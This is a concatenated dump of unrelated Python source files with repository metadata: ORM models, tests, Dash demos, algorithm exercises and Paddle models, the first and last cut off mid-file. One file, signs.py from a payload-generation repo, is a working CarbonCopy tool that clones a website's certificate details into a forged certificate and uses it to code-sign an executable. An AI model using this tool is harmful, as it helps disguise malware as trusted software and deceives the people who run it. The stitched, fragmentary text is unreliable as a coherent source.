# 创建新的实例
s = Student()
# 绑定三个属性
s.name = 'Michael'
s.age = 25
# AttributeError: 'Student' object has no attribute 'score'
# s.score = 99
# 继承的子类不起作用
class GraduateStudent(Student):
pass
g = GraduateStudent()
g.score = 9999
print(g.score)
| 13.458333 | 65 | 0.70485 |
1980e7cae20af40233dbc3e1774fd4148042bddb
| 451 |
py
|
Python
|
Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Cracking_the_Coding_Interview/linked_lists_detect_a_cycle.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
def has_cycle(head):
curr = head
seen = set()
while curr:
if curr in seen:
return True
seen.add(curr)
curr = curr.next
return False
# Much better to understand
def has_cycle(head):
fast = head;
while (fast != None and fast.next != None):
fast = fast.next.next;
head = head.next;
if(head == fast):
return True;
return False;
| 18.791667 | 47 | 0.543237 |
d0e5c87d206ae13427676218f0cd8cf00afd7dc9
| 2,259 |
py
|
Python
|
src/onegov/user/models/role_mapping.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/models/role_mapping.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/models/role_mapping.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm import Base
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.user.models.group import UserGroup
from onegov.user.models.user import User
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from uuid import uuid4
class RoleMapping(Base, ContentMixin, TimestampMixin):
""" Defines a generic role mapping between user and/or group and any
other model (content).
The model does not define the relationship to the content. Instead, the
realtionship should be defined in the content model when needed::
role_mappings = relationship(
RoleMapping,
primaryjoin=(
"and_("
"foreign(RoleMapping.content_id) == cast(MyModel.id, TEXT),"
"RoleMapping.content_type == 'my_models'"
")"
),
viewonly=True
)
"""
__tablename__ = 'role_mappings'
#: the type of the item, this can be used to create custom polymorphic
#: subclasses of this class. See
#: `<http://docs.sqlalchemy.org/en/improve_toc/\
#: orm/extensions/declarative/inheritance.html>`_.
type = Column(Text, nullable=True)
__mapper_args__ = {
'polymorphic_on': type
}
#: the id of the role mapping
id = Column(UUID, nullable=False, primary_key=True, default=uuid4)
#: the role is relevant for security in onegov.core
role = Column(Text, nullable=False)
#: the group this mapping belongs to
group_id = Column(UUID, ForeignKey(UserGroup.id), nullable=True)
group = relationship(
UserGroup, backref=backref('role_mappings', lazy='dynamic')
)
#: the user this mapping belongs to
username = Column(Text, ForeignKey(User.username), nullable=True)
user = relationship(
User, backref=backref('role_mappings', lazy='dynamic')
)
#: the content this mapping belongs to
content_id = Column(Text, nullable=False)
#: the content type (table name) this mapping belongs to
content_type = Column(Text, nullable=False)
| 32.271429 | 76 | 0.684816 |
de1af118f8154041eb169fa93ae07d197413fdc9
| 420 |
py
|
Python
|
projects/g3h2-algorithm/practice2/4_max_sum.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice2/4_max_sum.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice2/4_max_sum.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
def max_sum(d):
res = d[0]
max_i = 0
max_j = 1
i = 0
j = 0
max_count = 0
for item in d:
max_count += item
j += 1
if max_count > res:
res = max_count
max_i, max_j = i, j
if max_count <= 0:
max_count = 0
i = j
return res, max_i, max_j
if __name__ == '__main__':
print(max_sum([-2, 11, -4, 13, -5, -2]))
| 18.26087 | 44 | 0.442857 |
de58a3502bf8f5f03eefe7dc12701270d623da2b
| 37 |
py
|
Python
|
zencad/internal_models/__init__.py
|
Spiritdude/zencad
|
4e63b1a6306dd235f4daa2791b10249f7546c95b
|
[
"MIT"
] | 5 |
2018-04-11T14:11:40.000Z
|
2018-09-12T19:03:36.000Z
|
zencad/internal_models/__init__.py
|
Spiritdude/zencad
|
4e63b1a6306dd235f4daa2791b10249f7546c95b
|
[
"MIT"
] | null | null | null |
zencad/internal_models/__init__.py
|
Spiritdude/zencad
|
4e63b1a6306dd235f4daa2791b10249f7546c95b
|
[
"MIT"
] | null | null | null |
from .knight import knight as knight
| 18.5 | 36 | 0.810811 |
c20f4544dcae0f2ae1155940864d2e8c71ea5217
| 721 |
py
|
Python
|
packages/watchmen-storage/src/watchmen_storage/storage_exception.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-storage/src/watchmen_storage/storage_exception.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-storage/src/watchmen_storage/storage_exception.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
# noinspection DuplicatedCode
class InsertConflictException(Exception):
pass
class OptimisticLockException(Exception):
pass
class UnexpectedStorageException(Exception):
pass
class UnsupportedCriteriaException(UnexpectedStorageException):
pass
class UnsupportedComputationException(UnexpectedStorageException):
pass
class UnsupportedStraightColumnException(UnexpectedStorageException):
pass
class NoFreeJoinException(UnexpectedStorageException):
pass
class NoCriteriaForUpdateException(UnexpectedStorageException):
pass
class UnsupportedSortMethodException(UnexpectedStorageException):
pass
class EntityNotFoundException(Exception):
pass
class TooManyEntitiesFoundException(Exception):
pass
| 16.386364 | 69 | 0.859917 |
e413b3fc667b1726d6c8e96795d74b5e9453b03d
| 1,788 |
py
|
Python
|
Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/PenfieldAI/Scripts/PenfieldAssign/PenfieldAssign_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
"""Base Script for Cortex XSOAR - Unit Tests file
Pytest Unit Tests: all funcion names must start with "test_"
More details: https://xsoar.pan.dev/docs/integrations/unit-testing
MAKE SURE YOU REVIEW/REPLACE ALL THE COMMENTS MARKED AS "TODO"
"""
import demistomock as demisto
import json
import io
from PenfieldAssign import penfield_assign, main
# from pytest import *
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
# DUMMY DATA
fake_analyst_ids = 'admin,person'
fake_category = 'fake_cat'
fake_created = 'fake_date'
fake_id = 'fake_id'
fake_name = 'fake_name'
fake_severity = 'Low'
# TODO: REMOVE the following dummy unit test function
fake_response = [{
'Contents': 'test_user'
}]
def test_penfield_assign(mocker):
# this overwrite the command call
mocker.patch.object(demisto, 'executeCommand', return_value=fake_response)
assert penfield_assign(
analyst_ids=fake_analyst_ids,
category=fake_category,
created=fake_created,
id=fake_id,
name=fake_name,
severity=fake_severity
) == fake_response
def test_main(mocker):
mock_users = util_load_json('test_data/test_2_users.json')
mock_incident = util_load_json('test_data/test_incident.json')
# overwrite get users, incidents, and args
mocker.patch.object(demisto, 'executeCommand', return_value=mock_users)
mocker.patch.object(demisto, 'incidents', return_value=mock_incident)
mocker.patch.object(demisto, 'args', return_value={'assign': "No"})
mocker.patch('PenfieldAssign.penfield_assign', return_value=fake_response)
mocker.patch.object(demisto, 'results')
main()
assert demisto.results.call_args.args[0] == 'penfield suggests: test_user'
| 27.9375 | 78 | 0.730984 |
29a345463c7da327be480a650107205a6fc27321
| 813 |
py
|
Python
|
2_Iterables/Dicts/dict_comprehensions.py
|
felixdittrich92/Python3
|
16b767465e4bdf0adc652c195d15384bb9faa4cf
|
[
"MIT"
] | 1 |
2022-03-02T07:16:30.000Z
|
2022-03-02T07:16:30.000Z
|
2_Iterables/Dicts/dict_comprehensions.py
|
felixdittrich92/Python3
|
16b767465e4bdf0adc652c195d15384bb9faa4cf
|
[
"MIT"
] | null | null | null |
2_Iterables/Dicts/dict_comprehensions.py
|
felixdittrich92/Python3
|
16b767465e4bdf0adc652c195d15384bb9faa4cf
|
[
"MIT"
] | null | null | null |
# key: value
dict1 = {x: x**2 for x in range(10)}
print(dict1)
# nur gerade
dict2 = {x: x**2 for x in range(10) if x % 2 == 0}
print(dict2)
# wenn > 5 quadrieren ansonsten hoch 1/2
dict3 = {x: x**2 if x > 5 else x**(1/2) for x in range(10) if x % 2 == 0}
print(dict3)
friends = ['hans', 'peter', 'max']
friend_keys = ['firstname', 'lastname', 'birthday']
"""
my_friend_dict = {
'hans': {'firstname': None, 'lastname': None, 'birthday': None},
'peter': {'firstname': None, 'lastname': None, 'birthday': None},
'max': {'firstname': None, 'lastname': None, 'birthday': None}
}
print(my_friend_dict)
"""
# als Dict Comprehension
my_friend_dict2 = {friend_name: {key: None for key in friend_keys} for friend_name in friends}
print(my_friend_dict2)
| 30.111111 | 94 | 0.599016 |
d9b0b5556ed264e01bd32d0132833c9d2bbf2371
| 2,652 |
py
|
Python
|
Rapid-Payload-main/signs.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Rapid-Payload-main/signs.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Rapid-Payload-main/signs.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/usr/bin/python3
# auto - signs for CarbonCOpy[paranoidninja] in RapidPayload
from OpenSSL import crypto
from sys import argv, platform
from pathlib import Path
import shutil
import ssl
import os
import subprocess
TIMESTAMP_URL = "http://sha256timestamp.ws.symantec.com/sha256/timestamp"
print("\033[1m\033[36m")
def CarbonCopy(host, port, signee, signed):
try:
#Fetching Details
ogcert = ssl.get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)
certDir = Path('certs')
certDir.mkdir(exist_ok=True)
#Creating Fake Certificate
CNCRT = certDir / (host + ".crt")
CNKEY = certDir / (host + ".key")
PFXFILE = certDir / (host + ".pfx")
#Creating Keygen
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()
#Setting Cert details from loaded from the original Certificate
cert.set_version(x509.get_version())
cert.set_serial_number(x509.get_serial_number())
cert.set_subject(x509.get_subject())
cert.set_issuer(x509.get_issuer())
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
cert.sign(k, 'sha256')
CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
try:
pfx = crypto.PKCS12()
except AttributeError:
pfx = crypto.PKCS12Type()
pfx.set_privatekey(k)
pfx.set_certificate(cert)
pfxdata = pfx.export()
PFXFILE.write_bytes(pfxdata)
if platform == "win32":
shutil.copy(signee, signed)
subprocess.check_call(["signtool.exe", "sign", "/v", "/f", PFXFILE,
"/d", "MozDef Corp", "/tr", TIMESTAMP_URL,
"/td", "SHA256", "/fd", "SHA256", signed])
else:
args = ("osslsigncode", "sign", "-pkcs12", PFXFILE,
"-n", "Notepad Benchmark Util", "-i", TIMESTAMP_URL,
"-in", signee, "-out", signed)
subprocess.check_call(args)
except Exception as ex:
print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))
def main():
if len(argv) != 5:
print("[+] Descr: Impersonates the Certificate of a website\n[!] Usage: " + argv[0] + " <hostname> <port> <build-executable> <signed-executable>\n")
else:
CarbonCopy(argv[1], argv[2], argv[3], argv[4])
if __name__ == "__main__":
main()
| 32.740741 | 156 | 0.607089 |
8aaebae5da2aaee6af5f2259534930c89f52dd32
| 3,589 |
py
|
Python
|
packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/storage/raw_data_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict, List, Optional
from watchmen_data_kernel.topic_schema import TopicSchema
from watchmen_model.admin import Factor
from watchmen_model.pipeline_kernel import TopicDataColumnNames
from watchmen_storage import EntityCriteriaExpression, EntityRow, EntityShaper
from watchmen_utilities import ArrayHelper
from .data_entity_helper import TopicDataEntityHelper
from .data_service import TopicDataService
from .factor_column_mapper import TopicFactorColumnMapper
from .shaper import TopicShaper
class RawTopicFactorColumnMapper(TopicFactorColumnMapper):
def get_factors(self, schema: TopicSchema) -> List[Factor]:
return ArrayHelper(schema.get_flatten_factors()).map(lambda x: x.get_factor()).to_list()
class RawTopicShaper(TopicShaper):
def create_factor_column_mapper(self, schema: TopicSchema) -> TopicFactorColumnMapper:
return RawTopicFactorColumnMapper(schema)
def serialize(self, data: Dict[str, Any]) -> EntityRow:
row = self.serialize_fix_columns(data)
row[TopicDataColumnNames.RAW_TOPIC_DATA.value] = data.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
ArrayHelper(self.get_mapper().get_factor_names()).each(lambda x: self.serialize_factor(data, x, row))
return row
def deserialize(self, row: EntityRow) -> Dict[str, Any]:
data = self.deserialize_fix_columns(row)
data[TopicDataColumnNames.RAW_TOPIC_DATA.value] = row.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
ArrayHelper(self.get_mapper().get_column_names()).each(lambda x: self.deserialize_column(row, x, data))
return data
class RawTopicDataEntityHelper(TopicDataEntityHelper):
def create_entity_shaper(self, schema: TopicSchema) -> EntityShaper:
return RawTopicShaper(schema)
def is_versioned(self) -> bool:
return False
def find_version(self, data: Dict[str, Any]) -> int:
"""
always return -1
"""
return -1
def build_version_criteria(self, data: Dict[str, Any]) -> Optional[EntityCriteriaExpression]:
return None
def assign_version(self, data: Dict[str, Any], version: int) -> None:
"""
do nothing, raw topic has no version column
"""
pass
class RawTopicDataService(TopicDataService):
def try_to_wrap_to_topic_data(self, data: Dict[str, Any]) -> Dict[str, Any]:
self.delete_reversed_columns(data)
def wrap_flatten_factor(factor: Factor, from_data: Dict[str, Any], to_data: Dict[str, Any]) -> None:
name = factor.name
# copy flatten value to wrapped data
to_data[name] = from_data.get(name)
if name.find('.') != -1 and name in from_data:
del from_data[name]
wrapped_data = {TopicDataColumnNames.RAW_TOPIC_DATA.value: data}
# retrieve flatten factors
flatten_factors = self.schema.get_flatten_factors()
ArrayHelper(flatten_factors) \
.map(lambda x: x.get_factor()) \
.each(lambda x: wrap_flatten_factor(x, data, wrapped_data))
return wrapped_data
# return {TopicDataColumnNames.RAW_TOPIC_DATA.value: data}
def try_to_unwrap_from_topic_data(self, topic_data: Dict[str, Any]) -> Dict[str, Any]:
unwrapped_data = {}
# remove flatten factors
reserved_keys = [
TopicDataColumnNames.ID.value,
TopicDataColumnNames.TENANT_ID.value,
TopicDataColumnNames.INSERT_TIME.value,
TopicDataColumnNames.UPDATE_TIME.value
]
for key, value in topic_data.items():
if key in reserved_keys:
unwrapped_data[key] = value
if TopicDataColumnNames.RAW_TOPIC_DATA.value in topic_data:
pure_data = topic_data.get(TopicDataColumnNames.RAW_TOPIC_DATA.value)
if pure_data is not None:
for key, value in pure_data.items():
unwrapped_data[key] = value
return unwrapped_data
| 35.89 | 105 | 0.775704 |
6a52eb6a44e77af60b2317f2c0310c050671c217
| 1,902 |
py
|
Python
|
webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
webapp/dash_tutorial_plotly/basic_callbacks/slider_example.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
df = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv')
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div([
dcc.Graph(id="graph-with-slider"),
dcc.Slider(
id="year-slider",
min=df["year"].min(),
max=df["year"].max(),
value=df["year"].min(),
marks={str(year): str(year) for year in df["year"].unique()},
step=None,
)
])
@app.callback(
Output("graph-with-slider", "figure"),
[Input("year-slider", "value")])
def update_figure(selected_year):
filtered_df = df[df.year == selected_year]
traces = []
for i in filtered_df.continent.unique():
df_by_continent = filtered_df[filtered_df["continent"] == i]
traces.append(dict(
x=df_by_continent['gdpPercap'],
y=df_by_continent['lifeExp'],
text=df_by_continent['country'],
mode='markers',
opacity=0.7,
marker={
"size": 15,
"line": {"width": 0.5, "color": "white"}
},
name=i,
))
return {
"data": traces,
"layout": dict(
xaxis={"type": "log", "title": "GDP Per Capita",
"range": [2.3, 4.8]},
yaxis={"title": "Life Expectancy", "range": [20, 90]},
margin={"l": 40, "b": 40, "t": 10, "r": 10},
legend={"x": 0, "y": 1},
hovermode="closest",
transition={"duration": 500},
)
}
if __name__ == "__main__":
app.run_server(debug=True)
| 29.261538 | 103 | 0.538906 |
6a9afce5f6738a7bfc708ecfa9395d60aab99c5f
| 1,279 |
py
|
Python
|
py/jpy/src/test/python/jpy_translation_test.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 55 |
2021-05-11T16:01:59.000Z
|
2022-03-30T14:30:33.000Z
|
py/jpy/src/test/python/jpy_translation_test.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 943 |
2021-05-10T14:00:02.000Z
|
2022-03-31T21:28:15.000Z
|
py/jpy/src/test/python/jpy_translation_test.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 29 |
2021-05-10T11:33:16.000Z
|
2022-03-30T21:01:54.000Z
|
# This file was modified by Deephaven Data Labs.
import unittest
import jpyutil
jpyutil.init_jvm(jvm_maxmem='512M', jvm_classpath=['target/test-classes'])
import jpy
class DummyWrapper:
def __init__(self, theThing):
self.theThing = theThing
def getValue(self):
return 2 * self.theThing.getValue()
def make_wrapper(type, thing):
return DummyWrapper(thing)
class TestTypeTranslation(unittest.TestCase):
def setUp(self):
self.Fixture = jpy.get_type('org.jpy.fixtures.TypeTranslationTestFixture')
self.assertIsNotNone(self.Fixture)
def test_Translation(self):
fixture = self.Fixture()
thing = fixture.makeThing(7)
self.assertEqual(thing.getValue(), 7)
self.assertTrue(repr(type(thing)) in ["<type 'org.jpy.fixtures.Thing'>", "<class 'org.jpy.fixtures.Thing'>"])
jpy.type_translations['org.jpy.fixtures.Thing'] = make_wrapper
thing = fixture.makeThing(8)
self.assertEqual(thing.getValue(), 16)
self.assertEqual(type(thing), type(DummyWrapper(None)))
jpy.type_translations['org.jpy.fixtures.Thing'] = None
self.assertEqual(fixture.makeThing(9).getValue(), 9)
if __name__ == '__main__':
print('\nRunning ' + __file__)
unittest.main()
| 29.744186 | 117 | 0.68491 |
7c1180c3dfd51ac5958b332866461de583ff034c
| 608 |
py
|
Python
|
___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
___Python/Jonas/Python/p02_datenstrukturen/m03_anwendung_woerterbuecher.py
|
uvenil/PythonKurs201806
|
85afa9c9515f5dd8bec0c546f077d8cc39568fe8
|
[
"Apache-2.0"
] | null | null | null |
satz = "Fischers Fritze fischt frische Fische"
# 1Häufigkeit des Buchstabens e
# Ansatz 1) for-Schleife und Zähler anzahl
zaehler = 0
for zeichen in satz:
if zeichen == "e":
zaehler += 1
print (zaehler)
# 2 Häufigkeitsverteilung der buchstaben im satz
d = {}
for zeichen in satz:
if zeichen in d:
d[zeichen] += 1
else:
d[zeichen] = 1
print(d)
try:
d[zeichen] += 1
except KeyError:
d[zeichen] = 1
print(d)
# 3 Sortieren nach Häufigkeit
print(sorted(d)) #Lambdas
print(sorted(d.items(), key=lambda tupel: tupel[1], reverse=True))
| 19.612903 | 67 | 0.625 |
7cacdd2f038510eb6468dfd964cdb80fd7950f54
| 1,509 |
py
|
Python
|
Algorithms/notes/cookies_brian.py
|
tobias-fyi/02_algorithms
|
ab1a8a07c3560ad66712992e3af906e8fd316fe2
|
[
"MIT"
] | null | null | null |
Algorithms/notes/cookies_brian.py
|
tobias-fyi/02_algorithms
|
ab1a8a07c3560ad66712992e3af906e8fd316fe2
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/02_algorithms/Algorithms/notes/cookies_brian.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
"""
Algorithms :: Practice - eating cookies
Cookie Monster can eat either 0, 1, 2, or 3 cookies at a time.
If he were given a jar of cookies with `n` cookies inside of it,
how many ways could he eat all `n` cookies in the cookie jar?
Implement a function `eating_cookies` that counts the number of
possible ways Cookie Monster can eat all of the cookies in the jar.
"""
# %%
import sys
# n = 5
# 1 1 1 1 1
# 1 1 1 2
# 1 1 2 1
# 1 2 1 1
# 2 1 1 1
# 1 1 3
# 1 3 1
# 3 1 1
# 1 2 2
# 2 1 2
# 2 2 1
# 2 3
# 3 2
# %%
# def eating_cookies(n: int, cache=None) -> int:
# # Base cases
# if n == 0:
# return 1
# if n == 1:
# return 1
# if n == 2:
# return 2
# if n == 3:
# return 4
# ec1 = eating_cookies(n - 1)
# ec2 = eating_cookies(n - 2)
# ec3 = eating_cookies(n - 3)
# return ec1 + ec2 + ec3
# eating_cookies(9)
# %%
# With cache
def eating_cookies(n: int, cache=None) -> int:
if cache is None:
cache = {}
# cache = {0: 1, 1: 1, 2: 2, 3: 4}
# Base cases
if n == 0:
return 1
elif n == 1:
return 1
elif n == 2:
return 2
elif n == 3:
return 4
elif cache and cache[n]:
return cache[n]
else:
ec1 = eating_cookies(n - 1, cache)
ec2 = eating_cookies(n - 2, cache)
ec3 = eating_cookies(n - 3, cache)
cache[n] = ec1 + ec2 + ec3
return cache[n]
eating_cookies(15)
# %%
| 18.402439 | 67 | 0.520212 |
86fa8522f6c5465e7f7eb038298a112b9efcf0fa
| 2,609 |
py
|
Python
|
quark_core_api/core/workspace.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/core/workspace.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
quark_core_api/core/workspace.py
|
arcticle/Quark
|
17aa5b5869a9e9c7a04c1a371fef5998f33dc319
|
[
"MIT"
] | null | null | null |
import os
from quark_core_api.context import WorkspaceContext, ExperimentContext
from quark_core_api.common import ContextInitializer
from quark_core_api.core import QuarkExperiment, Script
from quark_core_api.exceptions import InvalidContextException
class QuarkWorkspace(object):
def __init__(self, id, name, context):
if not isinstance(context, WorkspaceContext):
raise InvalidContextException(context)
self._id = id
self._name = name
self._context = context
self._experiments = {}
self._scripts = {}
self.__initialize__()
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def directory(self):
return self._context.directory
@property
def experiments(self):
return self._experiments
@property
def scripts(self):
return self._scripts.values()
def create_experiment(self, name):
result = self._context.create_experiment(name)
if result > 0:
xp = self._create_experiment_object(name)
self._experiments[name] = xp
return xp
def delete_experiment(self, name):
result = self._context.delete_experiment(name)
if result > 0:
del self._experiments[name]
def create_script(self, script_name, content):
result = self._context.create_script(script_name, content)
if result > 0:
scr = self._create_script_object(script_name)
self._scripts[script_name] = scr
return scr
def __initialize__(self):
filename = "{}.quark".format(self._name)
self._context.create_storage(filename)
for script_name in self._context.scripts:
self._scripts[script_name] = self._create_script_object(script_name)
for xp_name in self._context.experiments:
self._experiments[xp_name] = self._create_experiment_object(xp_name)
def _get_experiment_location(self, experiment_name):
return os.path.join(self._context.directory, "experiments", experiment_name)
def _create_script_object(self, script_name):
directory = os.path.join(self._context.directory, "scripts")
return Script(script_name, directory)
def _create_experiment_object(self, experiment_name):
xp_dir = self._get_experiment_location(experiment_name)
ctx = ExperimentContext(xp_dir, ContextInitializer.experiment)
args = (experiment_name, self._scripts, ctx)
return QuarkExperiment(*args)
| 29.988506 | 84 | 0.676504 |
d48c6aed5aec50042d6e584932d8e053cd809853
| 3,629 |
py
|
Python
|
tests/ernie_text_matching/model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
tests/ernie_text_matching/model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
tests/ernie_text_matching/model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
class PointwiseMatching(nn.Layer):
def __init__(self, pretrained_model, dropout=None):
super().__init__()
self.ptm = pretrained_model
self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)
# num_labels = 2 (similar or dissimilar)
self.classifier = nn.Linear(self.ptm.config["hidden_size"], 2)
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
_, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,
attention_mask)
cls_embedding = self.dropout(cls_embedding)
logits = self.classifier(cls_embedding)
probs = F.softmax(logits)
return probs
class PairwiseMatching(nn.Layer):
def __init__(self, pretrained_model, dropout=None, margin=0.1):
super().__init__()
self.ptm = pretrained_model
self.dropout = nn.Dropout(dropout if dropout is not None else 0.1)
self.margin = margin
# hidden_size -> 1, calculate similarity
self.similarity = nn.Linear(self.ptm.config["hidden_size"], 1)
def predict(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
_, cls_embedding = self.ptm(input_ids, token_type_ids, position_ids,
attention_mask)
cls_embedding = self.dropout(cls_embedding)
sim_score = self.similarity(cls_embedding)
sim_score = F.sigmoid(sim_score)
return sim_score
def forward(self,
pos_input_ids,
neg_input_ids,
pos_token_type_ids=None,
neg_token_type_ids=None,
pos_position_ids=None,
neg_position_ids=None,
pos_attention_mask=None,
neg_attention_mask=None):
_, pos_cls_embedding = self.ptm(pos_input_ids, pos_token_type_ids,
pos_position_ids, pos_attention_mask)
_, neg_cls_embedding = self.ptm(neg_input_ids, neg_token_type_ids,
neg_position_ids, neg_attention_mask)
pos_embedding = self.dropout(pos_cls_embedding)
